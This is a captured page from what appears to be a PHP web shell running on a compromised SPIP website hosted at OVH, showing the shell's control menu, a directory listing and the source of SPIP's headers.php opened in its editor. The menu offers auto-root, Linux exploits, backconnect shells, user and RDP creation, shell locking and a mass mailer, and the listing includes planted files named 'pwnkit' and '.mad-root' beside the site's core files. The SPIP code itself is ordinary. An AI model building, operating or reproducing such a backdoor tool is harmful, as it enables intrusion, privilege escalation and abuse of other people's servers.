Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
acces.php
13.5
KB
-rw----r--
actions.php
5.36
KB
-rw----r--
admin.php
9.46
KB
-rw----r--
auth.php
22.43
KB
-rw----r--
auth_handler.php
300
B
-rw-r--r--
autoriser.php
64.83
KB
-rw----r--
bandeau.php
8.42
KB
-rw----r--
boutons.php
2.49
KB
-rw----r--
charsets.php
28.17
KB
-rw----r--
chercher_logo.php
3.3
KB
-rw----r--
chercher_rubrique.php
11.33
KB
-rw----r--
commencer_page.php
4.49
KB
-rw----r--
completer_traduction.php
2.43
KB
-rw----r--
config.php
13.96
KB
-rw----r--
cookie.php
6.21
KB
-rw----r--
couleurs.php
3.24
KB
-rw----r--
csv.php
3.76
KB
-rw----r--
cvt_autosave.php
4.26
KB
-rw----r--
cvt_configurer.php
7.92
KB
-rw----r--
cvt_multietapes.php
10.15
KB
-rw----r--
definir_menus_favoris.php
1.08
KB
-rw----r--
distant.php
43.91
KB
-rw----r--
documents.php
8.84
KB
-rw----r--
drapeau_edition.php
6.82
KB
-rw----r--
editer.php
22.05
KB
-rw----r--
email_valide.php
1.74
KB
-rw----r--
envoyer_mail.php
7.67
KB
-rw----r--
exporter_csv.php
7.37
KB
-rw----r--
filtres.php
162.08
KB
-rw----r--
filtres_alertes.php
8.29
KB
-rw----r--
filtres_boites.php
4.79
KB
-rw----r--
filtres_dates.php
34.68
KB
-rw----r--
filtres_ecrire.php
17.33
KB
-rw----r--
filtres_images_lib_mini.php
59.89
KB
-rw----r--
filtres_images_mini.php
16.78
KB
-rw----r--
filtres_mime.php
4.72
KB
-rw----r--
filtres_mini.php
6.9
KB
-rw----r--
filtres_selecteur_generique.ph...
8.25
KB
-rw----r--
flock.php
20.88
KB
-rw----r--
genie.php
6.86
KB
-rw----r--
headers.php
7.77
KB
-rw----r--
icone_renommer.php
2.12
KB
-rw----r--
iconifier.php
1.37
KB
-rw----r--
importer_csv.php
4.8
KB
-rw----r--
index.php
2
B
-rw----r--
informer.php
2.95
KB
-rw----r--
install.php
15.69
KB
-rw----r--
invalideur.php
7.99
KB
-rw----r--
journal.php
1.11
KB
-rw----r--
json.php
2.2
KB
-rw----r--
lang.php
14.59
KB
-rw----r--
lang_liste.php
7.23
KB
-rw----r--
layer.php
5.93
KB
-rw----r--
lien.php
8.43
KB
-rw----r--
lien_court.php
1.17
KB
-rw----r--
liens.php
680
B
-rw----r--
lister_objets.php
2.13
KB
-rw----r--
livrer_fichier.php
7.7
KB
-rw----r--
log.php
3.43
KB
-rw----r--
math.php
4.42
KB
-rw----r--
meta.php
9.09
KB
-rw----r--
minipres.php
3.7
KB
-rw----r--
modeles.php
1.42
KB
-rw----r--
modifier.php
11.09
KB
-rw----r--
nfslock.php
11.47
KB
-rw----r--
notifications.php
5.76
KB
-rw----r--
pipelines.php
7.83
KB
-rw----r--
pipelines_ecrire.php
12.04
KB
-rw----r--
plonger.php
3.98
KB
-rw----r--
plugin.php
47.39
KB
-rw----r--
precharger_article.php
2.26
KB
-rw----r--
precharger_objet.php
7.2
KB
-rw----r--
prepare_recherche.php
5.72
KB
-rw----r--
preselectionner_parent_nouvel_...
2.19
KB
-rw----r--
presentation.php
8.63
KB
-rw----r--
presentation_mini.php
8.28
KB
-rw----r--
presenter_enfants.php
6.75
KB
-rw----r--
puce_statut.php
11.94
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
queue.php
20.62
KB
-rw----r--
recherche_to_array.php
8.15
KB
-rw----r--
rechercher.php
11.05
KB
-rw----r--
roles.php
12.12
KB
-rw----r--
rubriques.php
28.48
KB
-rw----r--
securiser_action.php
11.99
KB
-rw----r--
selectionner.php
5.27
KB
-rw----r--
session.php
21.59
KB
-rw----r--
simplexml_to_array.php
2.84
KB
-rw----r--
surligne.php
4.14
KB
-rw----r--
svg.php
19.55
KB
-rw----r--
texte.php
11.82
KB
-rw----r--
texte_mini.php
23.49
KB
-rw----r--
traduire.php
11.26
KB
-rw----r--
urls.php
11.05
KB
-rw----r--
utils.php
107.33
KB
-rw----r--
xml.php
7.47
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : headers.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Gestion des headers et redirections * * @package SPIP\Core\Headers **/ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Envoyer le navigateur sur une nouvelle adresse * * Le tout en évitant les attaques par la redirection (souvent indique par un `$_GET`) * * @example * ``` * $redirect = parametre_url(urldecode(_request('redirect')),'id_article=' . $id_article); * include_spip('inc/headers'); * redirige_par_entete($redirect); * ``` * * @param string $url URL de redirection * @param string $equiv ? * @param int $status Code de redirection (301 ou 302) **/ function redirige_par_entete($url, $equiv = '', $status = 302) { if (!in_array($status, [301, 302])) { $status = 302; } $url = trim(strtr($url, "\n\r", ' ')); # si l'url de redirection est relative, on la passe en absolue if (!preg_match(',^(\w+:)?//,', $url)) { include_spip('inc/filtres_mini'); $url = url_absolue($url); } if (defined('_AJAX') and _AJAX) { $url = parametre_url($url, 'var_ajax_redir', 1, '&'); } // ne pas laisser passer n'importe quoi dans l'url include_spip('inc/filtres'); $url = str_replace(['<', '"'], ['<', '"'], (string) $url); $url = str_replace(["\r", "\n", ' '], ['%0D', '%0A', '%20'], $url); while (str_contains($url, '%0A')) { $url = str_replace('%0A', '', $url); } // interdire les url inline avec des pseudo-protocoles : if ( (preg_match(',data:,i', $url) and preg_match('/base64\s*,/i', $url)) or preg_match(',(javascript|mailto):,i', $url) ) { $url = './'; } // Il n'y a que sous Apache que setcookie puis redirection fonctionne include_spip('inc/cookie'); if (!defined('_SERVEUR_SOFTWARE_ACCEPTE_LOCATION_APRES_COOKIE')) { define('_SERVEUR_SOFTWARE_ACCEPTE_LOCATION_APRES_COOKIE', '^(Apache|Cherokee|nginx)'); } if (!defined('_SERVEUR_SIGNATURE_ACCEPTE_LOCATION_APRES_COOKIE')) { define('_SERVEUR_SIGNATURE_ACCEPTE_LOCATION_APRES_COOKIE', 'Apache|Cherokee|nginx'); } if ( (!$equiv and !spip_cookie_envoye()) or ( (!empty($_SERVER['SERVER_SOFTWARE']) and _SERVEUR_SOFTWARE_ACCEPTE_LOCATION_APRES_COOKIE and preg_match('/' . _SERVEUR_SOFTWARE_ACCEPTE_LOCATION_APRES_COOKIE . '/i', $_SERVER['SERVER_SOFTWARE'])) or (!empty($_SERVER['SERVER_SIGNATURE']) and _SERVEUR_SIGNATURE_ACCEPTE_LOCATION_APRES_COOKIE and preg_match('/' . _SERVEUR_SIGNATURE_ACCEPTE_LOCATION_APRES_COOKIE . '/i', $_SERVER['SERVER_SIGNATURE'])) or function_exists('apache_getenv') or defined('_SERVER_APACHE') ) ) { @header('Location: ' . $url); $equiv = ''; } else { @header('Refresh: 0; url=' . $url); if (isset($GLOBALS['meta']['charset'])) { @header('Content-Type: text/html; charset=' . $GLOBALS['meta']['charset']); } $equiv = "<meta http-equiv='Refresh' content='0; url=" . attribut_url($url) . "'>"; } include_spip('inc/lang'); if ($status != 302) { http_response_code($status); } echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">', "\n", html_lang_attributes(), ' <head>', $equiv, ' <title>HTTP ' . $status . '</title> ' . ((isset($GLOBALS['meta']['charset'])) ? '<meta charset="' . $GLOBALS['meta']['charset'] . '">' : '') . ' </head> <body> <h1>HTTP ' . $status . '</h1> <a href="', attribut_url($url), '">', _T('navigateur_pas_redirige'), '</a></body></html>'; spip_log("redirige $status: $url"); exit; } function redirige_formulaire($url, $equiv = '', $format = 'message') { if ( !_AJAX and !headers_sent() and !_request('var_ajax') ) { redirige_par_entete(str_replace('&', '&', $url), $equiv); } // si c'est une ancre, fixer simplement le window.location.hash elseif ($format == 'ajaxform' && preg_match(',^#[0-9a-z\-_]+$,i', (string) $url)) { include_spip('inc/filtres'); return [ // on renvoie un lien masque qui sera traite par ajaxCallback.js "<a href='" . attribut_url($url) . "' name='ajax_ancre' style='display:none;'>anchor</a>", // et rien dans le message ok '' ]; } else { include_spip('inc/filtres'); // ne pas laisser passer n'importe quoi dans l'url $url = str_replace(['<', '"'], ['<', '"'], $url); $url = strtr($url, "\n\r", ' '); # en theorie on devrait faire ca tout le temps, mais quand la chaine # commence par ? c'est imperatif, sinon l'url finale n'est pas la bonne if (in_array($url[0], ['?', '/']) && !str_starts_with($url, '//')) { $url = url_de_base() . ltrim($url, '/'); } $url = str_replace('&', '&', $url); spip_log("redirige formulaire ajax: $url"); include_spip('inc/filtres'); if ($format == 'ajaxform') { return [ // on renvoie un lien masque qui sera traite par ajaxCallback.js '<a href="' . attribut_url($url) . '" name="ajax_redirect" style="display:none;">' . _T('navigateur_pas_redirige') . '</a>', // et un message au cas ou '<br><a href="' . quote_amp($url) . '">' . _T('navigateur_pas_redirige') . '</a>' ]; } else // format message texte, tout en js inline { return // ie poste les formulaires dans une iframe, il faut donc rediriger son parent "<script>if (parent.window){parent.window.document.location.replace(\"$url\");} else {document.location.replace(\"$url\");}</script>" . http_img_pack('loader.svg', '', " class='loader'") . '<br>' . '<a href="' . quote_amp($url) . '">' . _T('navigateur_pas_redirige') . '</a>'; } } } /** * Effectue une redirection par header PHP vers un script de l’interface privée * * @uses redirige_par_entete() Qui tue le script PHP. * @example * ``` * include_spip('inc/headers'); * redirige_url_ecrire('rubriques','id_rubrique=' . $id_rubrique); * ``` * * @param string $script * Nom de la page privée (exec) * @param string $args * Arguments à transmettre. Exemple `etape=1&autre=oui` * @param string $equiv * @return void **/ function redirige_url_ecrire($script = '', $args = '', $equiv = '') { return redirige_par_entete(generer_url_ecrire($script, $args, true), $equiv); } /** * Renvoie au client le header HTTP avec le message correspondant au code indiqué. * * Ainsi `http_status(301)` enverra le message `301 Moved Permanently`. * * @link https://www.php.net/manual/fr/function.http-response-code.php * @uses http_response_code() * @deprecated 4.1 Utiliser http_response_code() * * @param int $status * Code d'erreur **/ function http_status($status) { trigger_deprecation('spip', '4.1', 'Using "%s" is deprecated, use "%s" instead', __FUNCTION__, 'http_response_code'); http_response_code($status); } // Retourne ce qui va bien pour que le navigateur ne mette pas la page en cache function http_no_cache() { if (headers_sent()) { spip_log('http_no_cache arrive trop tard'); return; } $charset = empty($GLOBALS['meta']['charset']) ? 'utf-8' : $GLOBALS['meta']['charset']; // selon http://developer.apple.com/internet/safari/faq.html#anchor5 // il faudrait aussi pour Safari // header("Cache-Control: post-check=0, pre-check=0", false) // mais ca ne respecte pas // http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9 header("Content-Type: text/html; charset=$charset"); header('Expires: 0'); header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT'); header('Cache-Control: no-cache, must-revalidate'); header('Pragma: no-cache'); }
Close